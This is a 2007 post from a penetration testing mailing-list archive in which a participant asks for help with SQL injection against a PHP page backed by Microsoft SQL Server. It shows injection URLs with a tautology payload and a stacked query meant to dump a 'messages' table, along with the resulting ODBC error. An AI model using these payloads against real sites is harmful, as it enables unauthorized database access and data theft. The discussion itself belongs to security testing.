Penetration Testing mailing list archives
Re: SQL Injection- Bypassing magic_quotes
From: Danux <danuxx () gmail com>
Date: Tue, 9 Oct 2007 19:24:45 -0500
Hi, well, after taking some examples from you (thanks in advance), i am able to bypass single quotes son i can inject something simple as: http://www.site.com/mod.php?id=1%27%20or%201=1-- But now, when trying to print a full table.... with the following injection...: http://www.site.com/mod.php?id=1%27%20or%201=1--;select%20*%20from%20messages;-- there is a Warning saying that the Connecction is busy: Warning: odbc_exec() [function.odbc-exec]: SQL error: [Microsoft][ODBC SQL Server Driver]Connection is busy with results for another hstmt, SQL state S1000 in SQLExecDirect in .........mod.php So, i think i need a way to execute the second query (mine) before the one that mod.php executes by itself (mod.php?id=1) What you think? ------------------------------------------------------------------------ This list is sponsored by: Cenzic Need to secure your web apps NOW? Cenzic finds more, "real" vulnerabilities fast. Click to try it, buy it or download a solution FREE today! http://www.cenzic.com/downloads ------------------------------------------------------------------------
Current thread:
- SQL Injection- Bypassing magic_quotes Danux (Oct 03)
- Message not available
- Re: SQL Injection- Bypassing magic_quotes Danux (Oct 09)
- Message not available
- <Possible follow-ups>
- RE: SQL Injection- Bypassing magic_quotes Andrew Court (Oct 04)
- Re: SQL Injection- Bypassing magic_quotes Jorge Hoya (Oct 05)
- Re: SQL Injection- Bypassing magic_quotes Danux (Oct 09)
- Re: SQL Injection- Bypassing magic_quotes Jorge Hoya (Oct 05)
- Re: SQL Injection- Bypassing magic_quotes Danux (Oct 10)
- RE: SQL Injection- Bypassing magic_quotes Walsh, Leo (Oct 11)
- Re: SQL Injection- Bypassing magic_quotes Danux (Oct 11)
- RE: SQL Injection- Bypassing magic_quotes Gary Oleary-Steele (Oct 12)